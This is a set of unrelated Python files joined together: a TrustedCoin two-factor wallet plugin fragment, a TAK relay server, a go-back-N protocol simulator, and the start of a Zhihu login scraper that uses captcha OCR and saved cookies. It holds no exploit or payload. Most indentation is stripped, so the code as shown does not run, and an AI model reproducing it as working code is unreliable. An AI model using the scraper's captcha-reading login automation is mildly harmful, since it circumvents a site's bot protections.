xpub = make_xpub(get_billing_xpub(), long_id)
usernode = BIP32Node.from_xkey(xpub)
child_node = usernode.subkey_at_public_derivation([num])
pubkey = child_node.eckey.get_public_key_bytes(compressed=True)
if addr_type == 'legacy':
return bitcoin.public_key_to_p2pkh(pubkey)
elif addr_type == 'segwit':
return bitcoin.public_key_to_p2wpkh(pubkey)
else:
raise ValueError(f'unexpected billing type: {addr_type}')
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
t = seed_type(seed)
return is_any_2fa_seed_type(t)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].can_sign(tx, ignore_watching_only=True):
self.logger.info("twofactor: xpub3 not needed")
return
def wrapper(tx):
assert tx
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
def prompt_user_for_otp(self, wallet, tx, on_success, on_failure) -> None:
raise NotImplementedError()
@hook
def get_tx_extra_fee(self, wallet, tx: Transaction):
if type(wallet) != Wallet_2fa:
return
for o in tx.outputs():
if wallet.is_billing_address(o.address):
return o.address, o.value
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet: 'Wallet_2fa', *, suppress_connection_error=True):
if wallet.can_sign_without_server():
return
self.logger.info("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
if suppress_connection_error:
self.logger.info(repr(e))
return
raise
billing_index = billing_info['billing_index']
# add segwit billing address; this will be used for actual billing
billing_address = make_billing_address(wallet, billing_index, addr_type='segwit')
if billing_address != billing_info['billing_address_segwit']:
raise Exception(f'unexpected trustedcoin billing address: '
f'calculated {billing_address}, received {billing_info["billing_address_segwit"]}')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='segwit')
# also add legacy billing address; only used for detecting past payments in GUI
billing_address = make_billing_address(wallet, billing_index, addr_type='legacy')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='legacy')
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
            t.daemon = True
t.start()
return t
def make_seed(self, seed_type):
if not is_any_2fa_seed_type(seed_type):
raise Exception(f'unexpected seed type: {seed_type}')
return Mnemonic('english').make_seed(seed_type=seed_type)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard: BaseWizard):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('choose_seed_type', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def choose_seed_type(self, wizard):
seed_type = '2fa_segwit' if self.config.get('seedtype') == 'segwit' else '2fa'
self.create_seed(wizard, seed_type)
def create_seed(self, wizard, seed_type):
seed = self.make_seed(seed_type)
f = lambda x: wizard.request_passphrase(seed, x)
wizard.opt_bip39 = False
wizard.opt_ext = True
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
    def get_xkeys(cls, seed, t, passphrase, derivation):
assert is_any_2fa_seed_type(t)
xtype = 'standard' if t == '2fa' else 'p2wsh'
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
rootnode = BIP32Node.from_rootseed(bip32_seed, xtype=xtype)
child_node = rootnode.subkey_at_private_derivation(derivation)
return child_node.to_xprv(), child_node.to_xpub()
@classmethod
    def xkeys_from_seed(cls, seed, passphrase):
t = seed_type(seed)
if not is_any_2fa_seed_type(t):
raise Exception(f'unexpected seed type: {t}')
words = seed.split()
n = len(words)
if t == '2fa':
if n >= 20: # old scheme
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
                xprv1, xpub1 = cls.get_xkeys(' '.join(words[0:12]), t, '', "m/")
                xprv2, xpub2 = cls.get_xkeys(' '.join(words[12:]), t, '', "m/")
elif n == 12: # new scheme
                xprv1, xpub1 = cls.get_xkeys(seed, t, passphrase, "m/0'/")
                xprv2, xpub2 = cls.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception(f'unrecognized seed length for "2fa" seed: {n}')
elif t == '2fa_segwit':
            xprv1, xpub1 = cls.get_xkeys(seed, t, passphrase, "m/0'/")
            xprv2, xpub2 = cls.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception(f'unexpected seed type: {t}')
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
wizard.pw_args = WizardWalletPasswordSetting(password=password,
encrypt_storage=encrypt_storage,
storage_enc_version=StorageEncryptionVersion.USER_PASSWORD,
encrypt_keystore=bool(password))
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard: BaseWizard, seed, passphrase):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.pw_args = WizardWalletPasswordSetting(password=password,
encrypt_storage=encrypt_storage,
storage_enc_version=StorageEncryptionVersion.USER_PASSWORD,
encrypt_keystore=bool(password))
wizard.terminate()
def create_remote_key(self, email, wizard):
xpub1 = wizard.data['x1/']['xpub']
xpub2 = wizard.data['x2/']['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate(aborted=True)
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
if short_id != _id:
wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
.format(short_id, _id))
return
if xpub3 != _xpub3:
wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
.format(xpub3, _xpub3))
return
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_('Invalid one-time password.'))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate(aborted=True)
except Exception as e:
wizard.show_message(repr(e))
wizard.terminate(aborted=True)
else:
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.data['use_trustedcoin'] = True
wizard.terminate()
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
if (wizard.data['x1/']['xpub'] != xpub1 or
wizard.data['x2/']['xpub'] != xpub2):
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
rootnode = BIP32Node.from_xkey(xprv)
key = rootnode.subkey_at_private_derivation((0, 0)).eckey
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, db):
if db.get('wallet_type') != '2fa':
return
if not db.get('x1/'):
return self, 'show_disclaimer'
if not db.get('x2/'):
return self, 'show_disclaimer'
if not db.get('x3/'):
return self, 'accept_terms_of_use'
|
server.py
|
#######################################################
#
# TAKFreeServer.py
# Original author: naman108
# This code is Open Source, made available under the EPL 2.0 license.
# https://www.eclipse.org/legal/eplfaq.php
# credit to Harshini73 for base code
#
#######################################################
import sys
import os
PACKAGE_PARENT = '..'
SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
sys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))
import socket
import threading
import argparse
import time
import xml.etree.ElementTree as ET
import constants
import logging
from Controllers.RequestCOTController import RequestCOTController
from Controllers.serializer import Serializer
import multiprocessing as multi
const = constants.vars()
from logging.handlers import RotatingFileHandler
import uuid
import datetime
import sqlite3
from SQLcommands import sql
sql = sql()
'''
configure logging
'''
format = logging.Formatter(const.LOGTIMEFORMAT)
logger = logging.getLogger(const.LOGNAME)
logger.setLevel(logging.DEBUG)
debug = RotatingFileHandler(const.DEBUGLOG, maxBytes=const.MAXFILESIZE,backupCount=const.BACKUPCOUNT)
debug.setLevel(logging.DEBUG)
warning = RotatingFileHandler(const.WARNINGLOG, maxBytes=const.MAXFILESIZE,backupCount=const.BACKUPCOUNT)
warning.setLevel(logging.WARNING)
info = RotatingFileHandler(const.INFOLOG, maxBytes=const.MAXFILESIZE,backupCount=const.BACKUPCOUNT)
info.setLevel(logging.INFO)
debug.setFormatter(format)
warning.setFormatter(format)
info.setFormatter(format)
logger.addHandler(warning)
logger.addHandler(debug)
logger.addHandler(info)
logger.debug('called or imported')
hostname = socket.gethostname()
''' Server class '''
class ThreadedServer(object):
def __init__(self, host = const.IP, port=const.DEFAULTPORT):
#change from string
self.host = host
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.host, self.port))
self.client_dict = {}
logger.info('startup ip is '+self.host+' startup port is '+str(self.port))
self.emergencyDict = {}
#configure sql database
sqliteServer = sqlite3.connect(const.DATABASE)
cursor = sqliteServer.cursor()
cursor.execute(sql.CREATEUSERSTABLE)
sqliteServer.commit()
cursor.close()
sqliteServer.close()
self.bandaidUID = ''
def listen(self):
'''
listen for client connections and begin thread if found
'''
threading.Thread(target = self.bandaid, args = (), daemon=True).start()
self.sock.listen(1000)
while True:
try:
client, address = self.sock.accept()
threading.Thread(target = self.listenToClient,args = (client,address), daemon=True).start()
except Exception as e:
logger.warning('error in main listen function '+str(e))
#issue in following func
def bandaid(self):
while True:
start = datetime.datetime.now()
end = start + datetime.timedelta(minutes = const.RENEWTIME)
while datetime.datetime.now() < end:
time.sleep(10)
self.bandaidUID=uuid.uuid1()
mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
mysock.connect(('127.0.0.1', const.DEFAULTPORT))
mysock.send(Serializer().serializerRoot(RequestCOTController().ping(eventuid = self.bandaidUID)).encode())
mysock.recv(2048)
mysock.shutdown(socket.SHUT_RDWR)
mysock.close()
logger.info('finished bandaid keepalive')
            logger.info('number of threads is ')
logger.info(threading.enumerate())
def check_xml(self, xml_string, current_id):
'''
check xml type or class
'''
data_value = ''
try:
if xml_string == const.EMPTY_BYTE:
print('client disconnected via empty byte response')
self.client_dict[current_id]['alive'] = 0
logger.info(str(self.client_dict[current_id]['uid'])+' disconnected')
return const.FAIL
elif xml_string == None:
print('client disconnected via none response')
self.client_dict[current_id]['alive'] = 0
logger.info(str(self.client_dict[current_id]['uid'])+' disconnected')
return const.FAIL
tree = ET.fromstring(xml_string)
uid = tree.get('uid')
logger.debug('parsing data uid is ' +str(uid))
type = tree.get('type')
if type == "a-f-G-U-C":
self.client_dict[current_id]['id_data'] = xml_string
elif type == 'b-f-t-a':
detail = tree.find('detail')
marti = detail.find('marti')
dest = marti.find('dest')
destination = dest.attrib['callsign']
connData = self.client_dict[current_id]["id_data"]
for x in self.client_dict:
if self.client_dict[x]["callsign"] == destination:
self.client_dict[x]["main_data"].append(connData)
print('adding conn data to '+str(x))
logger.info('now adding connection data as follows')
logger.info(str(connData))
else:
pass
            try:
                uid_by_dot = uid.split('.')
                uid_by_dash = uid.split('-')
            except:
                uid_by_dot = []
                uid_by_dash = uid.split('-')
logger.debug(uid_by_dash)
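            # Emergency beacons carry uids ending in "-9-1-1"; they are
            # tracked in emergencyDict until a cancel message clears them.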
            if str(uid_by_dash[-1]) == '1' and str(uid_by_dash[-2]) == '1' and str(uid_by_dash[-3]) == '9':
for x in tree.iter('emergency'):
if x.get('cancel') != 'true':
self.emergencyDict[uid] = xml_string
else:
del self.emergencyDict[uid]
elif uid_by_dash[-1] == const.PING:
data_value = const.PING
elif len(uid_by_dot)>0:
if uid_by_dot[0] == const.GEOCHAT:
data_value = const.GEOCHAT
logger.info('received the following GeoChat '+str(xml_string))
else:
                    pass
else:
logger.info('received the following CoT '+str(xml_string))
pass
#adds data to all connected client data list except sending client
for detail in tree.findall('detail'):
marti = detail.find('marti')
if marti != None:
dest = marti.find('dest')
callsign = dest.attrib['callsign']
if type == 'b-f-t-a':
for x in self.client_dict:
id = x
if self.client_dict[id]['callsign'] == callsign:
self.client_dict[id]['main_data'].insert(-1 ,xml_string)
else:
pass
else:
for x in self.client_dict:
id = x
if self.client_dict[id]['callsign'] == callsign:
self.client_dict[id]['main_data'].append(xml_string)
else:
pass
else:
for x in self.client_dict:
if x == current_id:
pass
elif x!=current_id:
self.client_dict[x]['main_data'].append(xml_string)
return data_value
except Exception as e:
logger.warning('error in message parsing '+str(e))
logger.warning(xml_string)
def connectionSetup(self, client, address):
try:
sqliteServer = sqlite3.connect(const.DATABASE)
cursor = sqliteServer.cursor()
first_run = 1
            #create client entry in the main dictionary with arrays for data and chat, plus other state for the client's initial connection
current_id = 0
total_clients_connected = 0
total_clients_connected += 1
id_data = client.recv(const.STARTBUFFER)
print(id_data)
print('\n'+str(id_data))
print('\n \n')
tree = ET.fromstring(id_data)
uid = tree.get('uid')
            if uid == str(self.bandaidUID):
return 'Bandaid'
callsign = tree[1][1].attrib['callsign']
current_id = uuid.uuid1().int
#add identifying information
self.client_dict[current_id] = {'id_data': '', 'main_data': [], 'alive': 1, 'uid': '', 'client':client, 'callsign':callsign}
self.client_dict[current_id]['id_data'] = id_data
self.client_dict[current_id]['uid'] = uid
cursor.execute(sql.INSERTNEWUSER,(str(current_id), str(uid), str(callsign)))
sqliteServer.commit()
cursor.close()
sqliteServer.close()
#print(self.client_dict)
logger.info('client connected, information is as follows initial'+ '\n'+ 'connection data:'+str(id_data)+'\n'+'current id:'+ str(current_id))
return str(first_run)+' ? '+str(total_clients_connected)+' ? '+str(id_data)+' ? '+str(current_id)
except Exception as e:
logger.warning('error in connection setup: ' + str(e))
logger.warning(id_data)
return "error"
    def receiveAll(self, client):
try:
total_data = []
count = 0
dead = 0
final = []
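            # On CPython, an empty bytes object is 33 bytes, so
            # getsizeof(data) == BUFFER+33 means recv() filled the buffer
            # and more data is likely pending.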
while True:
data = client.recv(const.BUFFER)
print(sys.getsizeof(data))
if sys.getsizeof(data)==const.BUFFER+33:
total_data.append(data)
elif sys.getsizeof(data) < const.BUFFER+33:
total_data.append(data)
break
total_data=b''.join(total_data)
return total_data
except Exception as e:
logger.warning('error in receive all')
logger.warning(e)
return None
def listenToClient(self, client, address):
'''
Function to receive data from the client. this must be long as everything
'''
try:
defaults = self.connectionSetup(client, address)
if defaults == 'error':
client.shutdown(socket.SHUT_RDWR)
client.close()
return 1
elif defaults == 'Bandaid':
                client.shutdown(socket.SHUT_RDWR)
client.close()
return 1
else:
defaults = defaults.split(' ? ')
print(defaults)
first_run=defaults[0]
id_data=defaults[2]
current_id = defaults[3]
first_run = int(first_run)
id_data = bytes(id_data, 'utf-8')
current_id = int(current_id)
#main connection loop
killSwitch = 0
while killSwitch == 0:
#receive data
try:
if first_run == 0:
                            data = self.receiveAll(client)
logger.debug(data)
working = self.check_xml(data, current_id)
#checking if check_xml detected client disconnect
if working == const.FAIL:
timeoutInfo = Serializer().serializerRoot(RequestCOTController().timeout(eventhow = 'h-g-i-g-o', eventuid = uuid.uuid1(), linkuid = self.client_dict[current_id]['uid']))
print(timeoutInfo.encode())
logger.debug('sending timeout information')
if len(self.client_dict)>0:
for x in self.client_dict:
if x != current_id:
self.client_dict[x]['client'].send(timeoutInfo.encode())
else:
pass
else:
pass
uid = self.client_dict[current_id]['uid']
del self.client_dict[current_id]
sqliteServer = sqlite3.connect(const.DATABASE)
cursor = sqliteServer.cursor()
cursor.execute(sql.DELETEBYUID,(uid,))
sqliteServer.commit()
cursor.close()
sqliteServer.close()
client.shutdown(socket.SHUT_RDWR)
client.close()
break
elif working == const.PING:
logger.debug('received ping')
else:
pass
elif first_run == 1:
print('something \n')
for x in self.client_dict:
client = self.client_dict[x]['client']
if client != self.client_dict[current_id]['client']:
print('sending'+str(id_data))
print(id_data)
client.send(self.client_dict[current_id]['id_data'])
else:
pass
for x in self.client_dict:
data = self.client_dict[x]['id_data']
logger.debug('sending conn data '+str(self.client_dict[x]['id_data'])+'to '+str(client)+'\n')
client.send(data)
threading.Thread(target = self.sendClientData, args = (client, address, current_id), daemon=True).start()
#just some debug stuff
first_run = 0
except Exception as e:
logger.warning('error in main loop')
logger.warning(str(e))
client.close()
killSwitch = 1
return 1
except Exception as e:
client.close()
return 1
def sendClientData(self, client, address, current_id):
killSwitch = 0
try:
while killSwitch == 0:
time.sleep(const.DELAY)
if killSwitch == 1:
break
if len(self.emergencyDict)>0:
for x in self.emergencyDict:
client.send(self.emergencyDict[x])
logger.debug('emergency activated')
else:
pass
if len(self.client_dict[current_id]['main_data'])>0:
#iterate over a snapshot so removing items does not skip entries
for x in list(self.client_dict[current_id]['main_data']):
logger.debug(self.client_dict[current_id]['main_data'])
client.send(x)
print('\n'+'sent '+ str(x)+' to '+ str(address) + '\n')
self.client_dict[current_id]['main_data'].remove(x)
else:
client.send(Serializer().serializerRoot(RequestCOTController().ping(eventuid = uuid.uuid1())).encode())
client.shutdown(socket.SHUT_RDWR)
client.close()
except Exception as e:
logger.warning('error in send info '+str(e))
client.close()
return 1
def queryCallSign(self, uid):
for x in self.client_dict:
if self.client_dict[x]['uid']==uid:
return self.client_dict[x]['callsign']
else:
pass
def startup():
logger.info('starting windows service')
ThreadedServer(host = '',port = const.DEFAULTPORT).listen()
if __name__ == "__main__":
try:
parser=argparse.ArgumentParser()
parser.add_argument("-p", type=int)
args=parser.parse_args()
port_num = args.p
ThreadedServer('',port_num).listen()
except:
ThreadedServer(host = '',port = const.DEFAULTPORT).listen()
|
gobackn.py
|
import threading
import random
import time
import socket
LOCK = threading.Lock()
TIMEOUT = 1000
TIMEUP = False
NETWORK_LAYER_READY = True
BASE_TIME = int(round(time.time() * 1000))
current_milli_time = lambda: int(round(time.time() * 1000) - BASE_TIME)
TIMER = current_milli_time()
def add_zeroes(string, size):
zeroes = '0' * (size-len(string))
return zeroes + string
def add_zeroes_back(string, size):
zeroes = '0' * (size-len(string))
return string + zeroes
def get_lowest_ack(next_frame, ack):
print ()
while next_frame%MAX_SEQ != ack:
next_frame -= 1
return next_frame
def from_network_layer():
# Randomly generate data. Done.
repeat_string = random.randint(0, 65535)
times = random.randint(16, 110)
data = add_zeroes(bin(repeat_string)[2:], 16) * times
return data
def to_network_layer(msg):
# Todo -> Write this message onto a file
# print ('R: Received message.')
pass
def parse_message(msg):
# Parse the message and return a dictionary of seq_num, info and ack. Done.
r = {}
r['seq'] = int(msg[0:32], 2) % MAX_SEQ
r['ack'] = int(msg[32:64], 2)
length = int(msg[64:96], 2)
r['info'] = msg[256:(256+length)]
return r
def between(a, b, c):
abc = a<=b and b<c
cab = c<a and a<=b
bca = b<c and c<a
if abc or cab or bca:
return True
return False
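# Editorial note: circular-window membership test. Returns True when b
# lies in the half-open window [a, c) on the sequence circle, including
# when the window wraps past MAX_SEQ, e.g. with MAX_SEQ = 8:
#   between(6, 7, 2) -> True    (window 6,7,0,1 wraps around)
#   between(6, 3, 2) -> False   (3 is outside the window)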
def sent_details(frame, ack, length):
global TIMER
print ('\tSent Message: {0} of length: {1} and ack: {2} at time: {3}'.format(frame, length, ack, TIMER))
def send_data(frame_nr, frame_expected, ack_to_send, buffer):
sinfo = buffer[frame_nr]
sseq = "{0:b}".format(frame_nr)
ack = 0
if ack_to_send < 0:
ack = (frame_expected + MAX_SEQ - 1) % MAX_SEQ
else:
ack = ack_to_send
sack = "{0:b}".format(ack)
length = len(sinfo)
slength = "{0:b}".format(length)
# Construct the string to be sent. Done.
msg = add_zeroes(sseq, 32) + add_zeroes(sack, 32) + add_zeroes(slength, 32) + add_zeroes('', 160) + sinfo
msg = add_zeroes_back(msg, 2048)
SOCKET.sendall(msg.encode('utf-8'))
print ('--------------------------------')
sent_details(frame_nr, ack, len(sinfo))
# print ('S: Sent message frame: {0} and ack: {1}, length: {2}'.format(frame_nr, ack, len(sinfo)))
next_frame_to_send = 0
ack_expected = 0
frame_expected = 0
nbuffered = 0
ack_stack = []
def recieved_details(parsed_msg):
global frame_expected
global ack_expected
print ('\tExpected frame: {0} and ack: {1}'.format(frame_expected, ack_expected))
print ('\tReceived frame: {0} of length: {1} and ack: {2}'.format(parsed_msg['seq'], len(parsed_msg['info']), parsed_msg['ack']))
def recv_data():
global next_frame_to_send
global ack_expected
global frame_expected
global nbuffered
global ack_stack
global TIMER
# TIMEUP must be declared global here; otherwise the assignment in the
# timeout handler below would only bind a local variable
global TIMEUP
while True:
try:
SOCKET.settimeout(10)
msg = SOCKET.recv(2048)
p = random.random()
if p > LOSS:
LOCK.acquire()
r = parse_message(msg)
print ('R: Received message from socket: at time: {0}'.format(TIMER))
recieved_details(r)
if r['seq'] == frame_expected:  # value comparison; 'is' only worked via small-int caching
ack_stack.append(frame_expected)
# print ('R: Received expected frame')
TIMER = current_milli_time()
print ('R: Timer Restarted {0}'.format(TIMER))
to_network_layer(r['info'])
frame_expected = (frame_expected + 1) % MAX_SEQ
if between(ack_expected, r['ack'], next_frame_to_send):
# print ('R: Received expected ack')
nbuffered = nbuffered - 1
ack_expected = (ack_expected + 1) % MAX_SEQ
LOCK.release()
else:
print ('R: FRAME DROPPED')
except socket.timeout:
LOCK.acquire()
print ('R: Received Timeout Error')
TIMEUP = True
LOCK.release()
def gobackn(socket, max_seq, start_first, loss):
global next_frame_to_send
global ack_expected
global frame_expected
global nbuffered
global ack_stack
global NETWORK_LAYER_READY
global SOCKET
global MAX_SEQ
global TIMEUP
global TIMEOUT
global TIMER
global BASE_TIME
global LOSS
LOSS = loss
MAX_SEQ = max_seq
TIMER = current_milli_time()
SOCKET = socket
buffer = []
sender = start_first
recv_thread = threading.Thread(target=recv_data)
recv_thread.start()
BASE_TIME = int(round(time.time() * 1000))
TIMER = current_milli_time()
if not sender:
ack_expected = MAX_SEQ - 1
while True:
curr_time = current_milli_time()
TIMEUP = curr_time-TIMER > TIMEOUT
send_frame = start_first or ack_stack
if TIMEUP and sender:
# Received timeout, re-send data
LOCK.acquire()
print ('S: Time up when next frame to be sent is {0}'.format(next_frame_to_send))
TIMER = current_milli_time()
print ('S: Timer Restarted {0}'.format(TIMER))
TIMEUP = False
if next_frame_to_send < MAX_SEQ:
next_frame_to_send = 0
else:
next_frame_to_send = get_lowest_ack(next_frame_to_send-1, ack_expected)
print ('S: Re-sending from {0}'.format(next_frame_to_send))
for i in range(nbuffered):
send_data(next_frame_to_send, frame_expected, -1, buffer)
next_frame_to_send = next_frame_to_send + 1
LOCK.release()
if NETWORK_LAYER_READY and send_frame:
print ('S: Sending frame: {0}'.format(next_frame_to_send))
buffer.append(from_network_layer())
LOCK.acquire()
nbuffered = nbuffered + 1
next_frame_to_send = next_frame_to_send + 1
ack_to_send = -1
if ack_stack:
ack_to_send = ack_stack.pop()
send_data(next_frame_to_send-1, frame_expected, ack_to_send, buffer)
LOCK.release()
if nbuffered < MAX_SEQ:
NETWORK_LAYER_READY = True
else:
NETWORK_LAYER_READY = False
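# --- Hedged example (editorial; illustration only, kept commented out) ---
# Frame layout used by send_data/parse_message: 32-bit seq, 32-bit ack,
# 32-bit length, 160 bits of padding (256 header bits total), then the
# payload, zero-padded to 2048 characters. MAX_SEQ = 8 is an assumption:
#   MAX_SEQ = 8
#   payload = from_network_layer()
#   header = (add_zeroes(bin(3)[2:], 32) + add_zeroes(bin(2)[2:], 32) +
#             add_zeroes(bin(len(payload))[2:], 32) + add_zeroes('', 160))
#   frame = add_zeroes_back(header + payload, 2048)
#   parse_message(frame)  # -> {'seq': 3, 'ack': 2, 'info': payload}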
|
zhihu_login.py
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: zhihu_login.py
Description : Forked from https://github.com/zkqiang/zhihu-login, with crawling of the recommendation feed added
Author : LSQ
date: 2020/10/16
-------------------------------------------------
Change Activity:
2020/10/16: None
-------------------------------------------------
"""
import base64
import hashlib
import hmac
import json
import re
import threading
import time
import os
import random
# Logging module
import logging
import sys
# Email modules
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
import pytesseract
from pymongo import MongoClient
from pymongo.errors import DuplicateKeyError
from http import cookiejar
from urllib.parse import urlencode
import execjs
import requests
from PIL import Image
class ZhihuAccount(object):
"""
Make sure Node.js (version 7.0 or above) or another JS runtime is installed before use.
The error execjs._exceptions.ProgramError: TypeError: 'exports' means it is not installed.
Then run in the current directory: `$npm install jsdom`
"""
def __init__(self, username: str = None, password: str = None, sender: str = None, receivers: list = None,
mail_pass: str = None, logger=None):
self.logger = logger
self.username = username
self.password = password
self.sender = sender
self.receivers = receivers
self.mail_pass = mail_pass
self.login_data = {
'client_id': 'c3cef7c66a1843f8b3a9e6a1e3160e20',
'grant_type': 'password',
'source': 'com.zhihu.web',
'username': '',
'password': '',
'lang': 'en',
'ref_source': 'other_https://www.zhihu.com/signin?next=%2F',
'utm_source': ''
}
self.session = requests.session()
self.session.headers = {
'accept-encoding': 'gzip, deflate, br',
'Host': 'www.zhihu.com',
'Referer': 'https://www.zhihu.com/',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
'(KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36'
}
self.session.cookies = cookiejar.LWPCookieJar(filename='./cookies.txt')
def login(self, captcha_lang: str = 'en', load_cookies: bool = True):
"""
Simulate logging in to Zhihu.
:param captcha_lang: captcha type, 'en' or 'cn'
:param load_cookies: whether to load the cookies saved last time
:return: bool
If the Chinese captcha cannot be clicked when running under PyCharm,
